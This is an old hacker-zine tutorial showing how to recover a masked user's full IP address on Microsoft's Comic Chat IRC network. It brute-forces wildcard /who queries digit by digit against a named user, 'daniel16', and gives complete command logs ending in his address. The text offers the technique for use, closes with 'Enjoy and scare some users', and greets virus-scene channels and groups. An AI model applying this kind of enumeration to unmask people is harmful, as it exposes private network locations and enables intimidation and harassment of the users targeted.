-----========== IP sniffing with IRC and Pirch ==========-----
Have you ever tried to get an ip from a user on irc.msn.com(comic chat network) without host?
you'll get a /whois result like this from our user "daniel16"
   daniel16 is ~me@212.79.35.XXX * lost in trance
   daniel16 on @#german_talk 
   daniel16 using cpmsnchatb08 Microsoft Exchange Chat Service
   daniel16 End of /WHOIS list

You need to be op to get the full ip of this user, isn't it?
Microsoft thinks we need to be op to get his ip but we don't ;)
There is a nice command called "/who". 

But how do we use this?
It's very simple.
  Make a whois on the user whose ip you wanna have
  Our user has the ip 212.79.35 the last 3 numbers are encrypted
    (count of X = count of numbers: 3 X = 3 numbers)
  We need the part of the ip ms gives us to scan for his real ip!
  
  Now a sample for a simple scan:
    "/who 212?79?35?1*"
      we need to replace all "." with "?" else it' won't work!!!
  here the result:
    -
    212?79?35?1* End of /WHO list
  not found :(
  let's try "/who 212?79?35?2*"
    -
    #german_talk daniel16 H@ ~me@212.79.35.XXX :2 lost in trance
    212?79?35?2* End of /WHO list
  Oh. We found something. A part of his IP! (212.79.35.2XX)

  Now let's go on with the last 2 numbers ;)
    "/who 212?79?35?21*"
  result:
    -
    212?79?35?21* End of /WHO list
  not found ;(. let's try "/who 212?79?35?22*"
    -
    #german_talk daniel16 H@ ~me@212.79.35.XXX :2 lost in trance
    212?79?35?22* End of /WHO list
  OH! The second part of his IP(212.79.35.22X)  =)
  Now let's continue with the last number =)
------------------------------------------------------------------------------------
Command log:
    /who 212?79?35?221
    -
    212?79?35?221 End of /WHO list
    /who 212?79?35?222
    -
    212?79?35?222 End of /WHO list
    /who 212?79?35?223
    -
    212?79?35?223 End of /WHO list
    /who 212?79?35?224
    -
    212?79?35?224 End of /WHO list
    /who 212?79?35?225
    -
    212?79?35?225 End of /WHO list
    /who 212?79?35?226
    -
    #german_talk daniel16 H@ ~me@212.79.35.XXX :2 lost in trance
    212?79?35?226 End of /WHO list
------------------------------------------------------------------------------------

Now we found his whole IP (212.79.35.226)   =)
I'd call this method of finding someones IP "using somekind of bug to get an ip without op" ;)
That what you are doing to get a IP is called "IP sniffing". We sniffed the IP from the user
"daniel16".

------------------------------------------------------------------------------------
Here the whole command-log:
    /who 212?79?35?1*
    -
    212?79?35?1* End of /WHO list
    /who 212?79?35?2*
    -
    #german_talk daniel16 H@ ~me@212.79.35.XXX :2 lost in trance
    212?79?35?2* End of /WHO list
    /who 212?79?35?21*
    -
    212?79?35?21* End of /WHO list
    /who 212?79?35?22*
    -
    #german_talk daniel16 H@ ~me@212.79.35.XXX :2 lost in trance
    212?79?35?22* End of /WHO list
    /who 212?79?35?221
    -
    212?79?35?221 End of /WHO list
    /who 212?79?35?222
    -
    212?79?35?222 End of /WHO list
    /who 212?79?35?223
    -
    212?79?35?223 End of /WHO list
    /who 212?79?35?224
    -
    212?79?35?224 End of /WHO list
    /who 212?79?35?225
    -
    212?79?35?225 End of /WHO list
    /who 212?79?35?226
    -
    #german_talk daniel16 H@ ~me@212.79.35.XXX :2 lost in trance
    212?79?35?226 End of /WHO list
------------------------------------------------------------------------------------

Enjoy and scare some users
    The BugHunter

Greets to:
   all ppl in the channels:
      #byte, #german_pc, #german_talk, #german_vir, #vir, #virus
   all friend from real life (will not write your real names here ;-P )
   groups+members:
      -Cybernetic Crew : are we really alive?
      -Kefrens         : WE ARE BACK!!!!!
   ppl:
      -Spooky     : when will CB release CB-6- ?
      -Daemonlord : i am waiting for the new darkside ;)
      -Conny      : Wann kommst du wieder? ich vermisse dich! Hoffe das wir
                    bald wieder zusammen chatten können
      -BlackAngel : Immer noch so beschäftigt?
      -Sonyman, Chrisby, EvenWorse und alle anderen ops von #german_pc
                  : Laßt german_pc besser auf dem MS-Server  ;)
      -Snakebyte, Asmhead, Paradizer 
		  : Thx for the help with KF-Zine#1. Without your help it'd never became as big
		    and as nice as it is ;).
      -Freestyler : are you alive?
      -Acidbytes  : Deine mp3 is kewl =). Ich mag sie ;). Schade das du Kefrens verlassen hast :(
      -Gigabyte   : feel sorry about that you left Kefrens :(
